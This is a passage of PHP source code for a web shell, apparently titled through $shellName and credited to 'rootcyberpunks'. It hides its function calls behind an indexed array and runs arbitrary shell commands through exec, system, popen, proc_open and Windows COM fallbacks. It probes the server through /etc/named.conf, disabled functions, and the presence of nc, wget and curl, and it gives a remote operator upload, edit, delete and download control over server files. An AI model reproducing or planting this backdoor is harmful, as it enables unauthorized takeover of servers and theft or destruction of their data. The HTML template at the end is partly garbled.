Can't Read /etc/named.conf";
} else {
$count = 0;
foreach ($d0mains as $d0main) {
if (@$func[43]($d0main, "zone")) {
$func[32]('#zone "(.*)"#', $d0main, $domains);
$func[54]();
if ($func[55]($func[56]($domains[1][0])) > 2) {
$func[54]();
$count++;
}
}
}
$dom = "$count Domain";
}
$dir = $func[45]("\\", "/", $dir);
$scdir = $func[46]("/", $dir);
$total = $func[29]($dir);
$free = $func[30]($dir);
$pers = (int) (($free / $total) * 100);
$ds = @$func[31]("disable_functions");
$show_ds = !empty($ds)
? "$ds"
: "All function is accessible";
$cmd_uname = exe("uname -a");
$uname = $func[49]("php_uname")
? $func[41](@$func[0](), 0, 120)
: ($func[55]($cmd_uname) > 0
? $cmd_uname
: "( php_uname ) Function Disabled !");
if (strtolower($func[41](PHP_OS, 0, 3)) == "win") {
$sys = "win";
} else {
$sys = "unix";
}
if (isset($_GET["do"])) {
$do = $_GET["do"];
if ($do == "delete") {
if ($func[12]($dir)) {
if (deleter($dir)) {
flash(
"File/Folder deleted successfully!",
"Success",
"success",
"?dir=" . dirname($dir)
);
} else {
flash("File/Folder failed to delete!", "Failed", "danger");
}
} else {
flash("File/Folder is doesn't exist!", "Failed", "warning");
}
} elseif ($do == "download") {
if ($func[12]($dir)) {
header("Content-Type: application/octet-stream");
header("Content-Transfer-Encoding: Binary");
header("Content-Length: " . $func[10]($dir));
header(
"Content-disposition: attachment; filename=\"" .
basename($dir) .
"\""
);
} else {
flash("File is doesn't exist!", "Failed", "warning");
}
}
} else {
$do = "filesman";
$title = "Files Manager";
$icon = "archive";
}
isset($_POST["foldername"])
? ($func[12]("$dir/{$_POST["foldername"]}")
? flash("Folder name is exist!", "Failed", "warning")
: ($func[15]("$dir/{$_POST["foldername"]}")
? flash("Folder created successfully!", "Success", "success")
: flash("Folder failed to create!", "Failed", "danger")))
: null;
isset($_POST["filename"]) && isset($_POST["filecontent"])
? ($func[12]("$dir/{$_POST["filename"]}")
? flash("File name is exist!", "Failed", "warning")
: ($func[13]("$dir/{$_POST["filename"]}", $_POST["filecontent"])
? flash("File created successfully!", "Success", "success")
: flash("File failed to create!", "Failed", "danger")))
: null;
isset($_POST["newname"]) && isset($_POST["oldname"])
? ($func[12]("$dir/{$_POST["newname"]}")
? flash("File/Folder name is exist!", "Failed", "warning")
: ($func[16]("$dir/{$_POST["oldname"]}", $_POST["newname"])
? flash("File/Folder renamed successfully!", "Success", "success")
: flash("File/Folder failed to rename!", "Failed", "danger")))
: null;
isset($_POST["filename"]) && isset($_POST["content"])
? ($func[13]("$dir/{$_POST["filename"]}", $_POST["content"])
? flash("File saved successfully!", "Success", "success")
: flash("File failed to save!", "Failed", "danger"))
: null;
if (isset($_FILES["uploadfile"])) {
$n = $_FILES["uploadfile"]["name"];
for ($i = 0; $i < count($n); $i++) {
if ($func[11]($_FILES["uploadfile"]["tmp_name"][$i], $n[$i])) {
flash("File uploaded successfully!", "Success", "success");
} else {
flash("File failed to upload!", "Failed", "danger");
}
}
}
if (@$func[31]("open_basedir")) {
$basedir_data = @$func[31]("open_basedir");
if ($func[55]($basedir_data) > 120) {
$open_b =
"" .
$func[41]($basedir_data, 0, 120) .
"...";
} else {
$open_b = '' . $basedir_data . "";
}
} else {
$open_b = 'NONE';
}
if (!$func[49]("posix_getegid")) {
$user = $func[49]("get_current_user") ? @$func[64]() : "????";
$uid = $func[49]("getmyuid") ? @$func[65]() : "????";
$gid = $func[49]("getmygid") ? @$func[66]() : "????";
$group = "?";
} else {
$uid =
$func[49]("posix_getpwuid") && $func[49]("posix_geteuid")
? @$func[33]($func[67]())
: ["name" => "????", "uid" => "????"];
$gid =
$func[49]("posix_getgrgid") && $func[49]("posix_getegid")
? @$func[34]($func[68]())
: ["name" => "????", "gid" => "????"];
$user = $uid["name"];
$uid = $uid["uid"];
$group = $gid["name"];
$gid = $gid["gid"];
}
if ($sys == "unix") {
if (!@$func[31]("safe_mode")) {
if ($func[55](exe("id")) > 0) {
$userful = [
"gcc",
"lcc",
"cc",
"ld",
"make",
"php",
"perl",
"python",
"ruby",
"tar",
"gzip",
"bzip",
"bzialfa2",
"nc",
"locate",
"suidperl",
];
$x = 0;foreach($userful as $i) {
if (which($i)) {
$x++;
$useful .= $i . ", ";
}
}
if ($x == 0) {
$useful = "--------";
}
$downloaders = [
"wget",
"fetch",
"lynx",
"links",
"curl",
"get",
"lwp-mirror",
];
$x = 0;
foreach ($downloaders as $i) {
if (which($i)) {
$x++;
$downloader .= $i . ", ";
}
}
if ($x == 0) {
$downloader = "--------";
}
}
}
}
function hex($str)
{
global $func;
$r = "";
for ($i = 0; $i < $func[55]($str); $i++) {
$r .= dechex(ord($str[$i]));
}
return $r;
}
function dehex($str)
{
$r = "";
$len = strlen($str) - 1;
for ($i = 0; $i < $len; $i += 2) {
$r .= chr(hexdec($str[$i] . $str[$i + 1]));
}
return $r;
}
function formatSize($bytes)
{
$types = ["B", "KB", "MB", "GB", "TB"];
for (
$i = 0;
$bytes >= 1024 && $i < count($types) - 1;
$bytes /= 1024, $i++
);
return round($bytes, 2) . " " . $types[$i];
}
function perms($file)
{
global $func;
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
$info = "s";
} elseif (($perms & 0xa000) == 0xa000) {
$info = "l";
} elseif (($perms & 0x8000) == 0x8000) {
$info = "-";
} elseif (($perms & 0x6000) == 0x6000) {
$info = "b";
} elseif (($perms & 0x4000) == 0x4000) {
$info = "d";
} elseif (($perms & 0x2000) == 0x2000) {
$info = "c";
} elseif (($perms & 0x1000) == 0x1000) {
$info = "p";
} else {
$info = "u";
}
$info .= $perms & 0x0100 ? "r" : "-";
$info .= $perms & 0x0080 ? "w" : "-";
$info .=
$perms & 0x0040
? ($perms & 0x0800
? "s"
: "x")
: ($perms & 0x0800
? "S"
: "-");
$info .= $perms & 0x0020 ? "r" : "-";
$info .= $perms & 0x0010 ? "w" : "-";
$info .=
$perms & 0x0008
? ($perms & 0x0400
? "s"
: "x")
: ($perms & 0x0400
? "S"
: "-");
$info .= $perms & 0x0004 ? "r" : "-";
$info .= $perms & 0x0002 ? "w" : "-";
$info .=
$perms & 0x0001
? ($perms & 0x0200
? "t"
: "x")
: ($perms & 0x0200
? "T"
: "-");
return $func[41](sprintf("%o", $perms), -4) . " >> " . $info;
}
function exe($in)
{
global $func;
$out = "";
try {
if ($func[49]("exec")) {
@$func[23]($in, $out);
$out = @join("\n", $out);
} elseif ($func[49]("passthru")) {
$func[48]();
@passthru($in);
$out = $func[27]();
} elseif ($func[49]("system")) {
$func[48]();
@system($in);
$out = $func[27]();
} elseif ($func[49]("shell_exec")) {
$out = $func[25]($in);
} elseif ($func[49]("popen") && $func[49]("pclose")) {
if (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
} elseif ($func[49]("proc_open")) {
$pipes = [];
$process = @proc_open(
$in . " 2>&1",
[["pipe", "w"], ["pipe", "w"], ["pipe", "w"]],
$pipes,
null
);
$out = @stream_get_contents($pipes[1]);
} elseif (class_exists("COM")) {
$ws = new COM("WScript.shell");
$exec = $ws->exec("cmd.exe /c " . $in);
$stdout = $exec->StdOut();
$out = $stdout->ReadAll();
}
} catch (Exception $e) {
}
return $out;
}
function checkName($name)
{
global $func;
if ($func[55]($name) > 18) {
return $func[41]($name, 0, 18) . "...";
}
return $name;
}
function checkPerm($dir, $perm)
{
global $func;
$perm = explode(">>", $perm);
if ($func[8]($dir)) {
return "" .
$perm[0] .
" >> " .
$perm[1] .
"";
} elseif (!$func[9]($dir)) {
return "" .
$perm[0] .
" >> " .
$perm[1] .
"";
} else {
return "" .
$perm[0] .
" >> " .
$perm[1] .
"";
}
}
function getowner($item)
{
global $func;
if ($func[49]("posix_getpwuid")) {
$downer = @$func[33](fileowner($item));
$downer = $downer["name"];
} else {
$downer = fileowner($item);
}
if ($func[49]("posix_getgrgid")) {
$dgrp = @$func[34](filegroup($item));
$dgrp = $dgrp["name"];
} else {
$dgrp = filegroup($item);
}
return $downer . "/" . $dgrp;
}
function geticon($file)
{
global $func;
$ext = strtolower($func[35]($file, PATHINFO_EXTENSION));
if (
$ext == "php" ||
$ext == "html" ||
$ext == "js" ||
$ext == "css" ||
$ext == "py" ||
$ext == "perl" ||
$ext == "sh"
) {
return "file-code";
} elseif ($ext == "pdf") {
return "file-pdf";
} elseif ($ext == "txt") {
return "file-alt";
} elseif ($ext == "csv") {
return "file-csv";
} elseif (
$ext == "jpg" ||
$ext == "png" ||
$ext == "jpeg" ||
$ext == "gif"
) {
return "file-image";
} elseif ($ext == "mp4" || $ext == "3gp" || $ext == "mkv") {
return "file-video";
} elseif ($ext == "docx" || $ext == "doc" || $ext == "docm") {
return "file-word";
} elseif ($ext == "ppt" || $ext == "pptx") {
return "file-powerpoint";
} elseif (
$ext == "xlsx" ||
$ext == "xlsb" ||
$ext == "xlsm" ||
$ext == "xltx" ||
$ext == "xltm"
) {
return "file-excel";
} elseif ($ext == "mp3" || $ext == "wav") {
return "file-audio";
} elseif ($ext == "sql" || $ext == "db") {
return "database";
} elseif (
$ext == "zip" ||
$ext == "tar" ||
$ext == "gz" ||
$ext == "tar.gz" ||
$ext == "7z" ||
$ext == "bz2"
) {
return "file-archive";
} else {
return "file";
}
}
function which($p)
{
global $func;
$path = exe("which " . $p);
if (!empty($path)) {
return $func[55]($path);
}
return false;
}
function flash($message, $status, $class, $redirect = false)
{
if (!empty($_SESSION["message"])) {
unset($_SESSION["message"]);
}
if (!empty($_SESSION["class"])) {
unset($_SESSION["class"]);
}
if (!empty($_SESSION["status"])) {
unset($_SESSION["status"]);
}
$_SESSION["message"] = $message;
$_SESSION["class"] = $class;
$_SESSION["status"] = $status;
if ($redirect) {
header("Location: " . $redirect);
exit();
}
return true;
}
function clear()
{
if (!empty($_SESSION["message"])) {
unset($_SESSION["message"]);
}
if (!empty($_SESSION["class"])) {
unset($_SESSION["class"]);
}
if (!empty($_SESSION["status"])) {
unset($_SESSION["status"]);
}
return true;
}
function deleter($d)
{
global $func;
if (trim($func[35]($d, PATHINFO_BASENAME), ".") === "") {
return false;
}
if ($func[6]($d)) {
array_map(
"deleter",
glob($d . DIRECTORY_SEPARATOR . "{,.}*", GLOB_BRACE | GLOB_NOSORT)
);
rmdir($d);return true;
} else {
unlink($d);
return true;
}
return false;
}
$scandir = $func[21]($dir);
?>
= $shellName ?>
meta name="viewport" content="width=1024" />
alert-dismissible fade show my-3" role="alert">
= $_SESSION["status"] ?>! = $_SESSION["message"] ?>
Server Information
Operating System |
: = $uname ?> |
PHP Version |
: = $func[1]() ?> |
Storage |
: Total = = formatSize($total) ?>, Free = = formatSize(
$free
) ?> [= $pers ?>%] |
Disable Functions |
: = $show_ds ?> |
CURL : = $func[49]("curl_version")
? 'ON'
: 'OFF' ?> | SSH2 : = $func[49](
"ssh2_connect"
)
? 'ON'
: 'OFF' ?> | Magic Quotes : = $func[49](
"get_magic_quotes_gpc"
)
? 'ON'
: 'OFF' ?> | MySQL : = $func[49](
"mysql_get_client_info"
) || class_exists("mysqli")
? 'ON'
: 'OFF' ?> | MSSQL : = $func[49](
"mssql_connect"
)
? 'ON'
: 'OFF' ?> | PostgreSQL : = $func[49](
"pg_connect"
)
? 'ON'
: 'OFF' ?> | Oracle : = $func[49](
"oci_connect"
)
? 'ON'
: 'OFF' ?> |
Safe Mode : = @$func[31]("safe_mode")
? 'ON'
: 'OFF' ?> | Open Basedir : = $open_b ?> | Safe Mode Exec Dir : = @$func[31](
"safe_mode_exec_dir"
)
? '' .
@$func[31]("safe_mode_exec_dir") .
""
: 'NONE' ?> | Safe Mode Include Dir : = @$func[31](
"safe_mode_include_dir"
)
? '' .
@$func[31]("safe_mode_include_dir") .
""
: 'NONE' ?> |
Path
[ = checkPerm($dir, perms($dir)) ?> ]
= $title ?>
Anjing
Name |
Type |
Size |
Last Modified |
Owner/Group |
Permission |
Action |
= $item ?>
= $item ?>
" class="text-decoration-none text-dark"> = checkName(
$item
) ?>
|
= $func[38]($item) ?> |
-- |
= $func[19]("Y-m-d h:i:s", $func[20]($item)) ?> |
= getowner($item) ?> |
= checkPerm($dir . "/" . $item, perms($dir . "/" . $item)) ?> |
|
= checkName($item) ?> |
= checkName(
$func[49]("mime_content_type")
? $func[63]($item)
: $func[38]($item)
) ?> |
= formatSize($func[10]($item)) ?> |
= $func[19]("Y-m-d h:i:s", $func[20]($item)) ?> |
= getowner($item) ?> |
= checkPerm($dir . "/" . $item, perms($dir . "/" . $item)) ?> |
|
Can't read this directory!
Copyright rootcyberpunks@gmail.com Coded by pHpmyadmin
Are you sure want to delete this?
Are you sure want to download this?